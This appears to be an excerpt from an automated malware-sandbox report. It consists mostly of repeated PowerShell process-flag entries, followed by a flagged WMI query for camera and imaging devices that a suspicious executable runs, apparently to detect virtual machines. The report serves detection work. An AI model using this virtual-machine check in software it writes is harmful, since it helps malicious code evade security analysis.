                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                              Malware Analysis System Evasion

                              barindex
                              Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
